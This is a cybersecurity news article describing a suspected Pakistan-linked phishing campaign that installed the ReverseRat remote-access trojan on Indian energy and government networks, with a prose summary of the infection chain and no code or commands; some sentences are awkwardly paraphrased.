Saturday, July 24, 2021

Suspected Pakistani hackers targeting the Indian Power company with ReverseRat

Must Read

US Senate Approves New Deepfake Bill

The US bill must now pass through the House of Representatives. US legislation mandating government study to deepfakes took a...

Salt Project patched a privilege escalation bug impacting SaltStack Salt minions

The Salt Project has patched a privilege escalation bug impacting SaltStack Salt minions that could be used during a...

Cyber Criminals Exploit zero-day vulnerability in FTA servers for Data Theft and Extortion

Cybersecurity company FireEye said today cybercriminal gang known as FIN11 performed a zero-day attack on Accellion FTA servers that...

According to a new study, a threat actor suspected of having links with Pakistan is targeting the government and the energy companies in the South and in the Central Asian region, to deploy the remote-access Trojan on the infected Windows operating systems.

“That’s why most of the organizations are showing signs of compromise were in India, and a very small number of them were in Afghanistan, and” Lumen, Black Lotus Labs said on Tuesday In a blogpost.

Some of the victims include a foreign government organization, a power transmission organization, and a power generation organization. The secret operation was said to have been started in at least January 2021. 

The intrusions are notable for several reasons, not least because in addition to its highly-targeted nature, the tactics, techniques, and procedures (TTPs) adopted by the adversary rely on repurposed open-source code and the use of compromised domains in the same country as the targeted entity to host their malicious files.

At the same time, the group has been carefully hidden in their activity by changing the registry keys and gives them the ability to maintain persistence on the device. 

The interpretation of the multi-stage supply chain of infection, Lumen, noted that the campaign that resulted in the victim sending of the two agents, one in memory, while the second one was side-loaded, granting threat actor persistence on the infected workstations.”

The attack begins with a malicious link sent via phishing e-mail messages or emails when clicked, It will download in a ZIP file containing a Microsoft shortcut file (.lnk) and a decoy PDF file from a compromised domain.

With the shortcut of a file, in addition to the description of the document is favorable to something, the receiver also takes care of stealthily fetching and running an HTA (HTML application) file from the same compromised website.

The lure documents largely describe events catering to India, disguising as a user manual for registering and booking an appointment for COVID-19 vaccine through the Cowin online portal, while a few others masquerade as the Bombay Sappers, a regiment of the Corps of Engineers of the Indian Army.

Regardless of the document that is displayed by the victims of the HTA file, which in itself is a JavaScript code, based on a GitHub project called CactusTorch to be used for the implementation of the 32-bit shellcode for a process that is carried out to finally install it .NET back-door is called Reverse Rat, which is a typical spy agent, with the ability to capture screenshots, to complete the implementation of the processes of all of the executable files, perform file operations, and then upload the data to a remote server.

The custom-developed framework also comes with a third component in which a second HTA file is downloaded from the same domain to deploy the open-source AllaKore remote agent, potentially in an alternative attempt to maintain access to the compromised network.

“While this threat actor’s targets have thus far remained within the South and Central Asian regions, they have proven effective at gaining access to networks of interest,” the researchers said. “Despite previously relying upon open-source frameworks such as AllaKore, the actor was able to remain effective and expand its capabilities with the development of the Svchostt agent and other components of the Reverse Rat project.”

Priyanshu Vijayvargiya
Founder and Editor-in-Chief of 'Virtualattacks Inc' Priyanshu Vijayvargiya is a cybersecurity analyst, Information Security professional, developer, and a white hat hacker.


Please enter your comment!
Please enter your name here

Latest News

OAIC: Uber found to have interfered with the privacy of over 1.2 million Australians

The Office of the Australian Information Commissioner (OAIC) has determined that Uber Technologies, Inc. and Uber B.V. have interfered...

Over 80 US Municipalities data are exposed due to Misconfigured Amazon S3

A team of Cybersecurity researchers at Wizcase found major data exposure of Over 80 US Municipalities due to the Misconfigured Amazon S3 Bucket. This happened...

Formbook malware Upgraded as an XLoader malware to Attack macOS Systems

Researchers have spotted an upgraded malware variant of Formbook malware which is now Upgraded as an XLoader malware to Attack macOS Systems. Cybersecurity researchers on...

Millions of HP, Samsung, Xerox Printers are Vulnerable to 16 year old bug

A 16-year-old security vulnerability affects Millions of HP, Samsung, Xerox Printers Driver allows attackers to gain admin rights on systems using the vulnerable driver...

MosaicLoader malware targets cracked software via SEO poisoning

New MosaicLoader malware targets users that are searching to download cracked software. Cybercriminals run ad campaigns in search engine results to boost their malicious...

More Articles Like This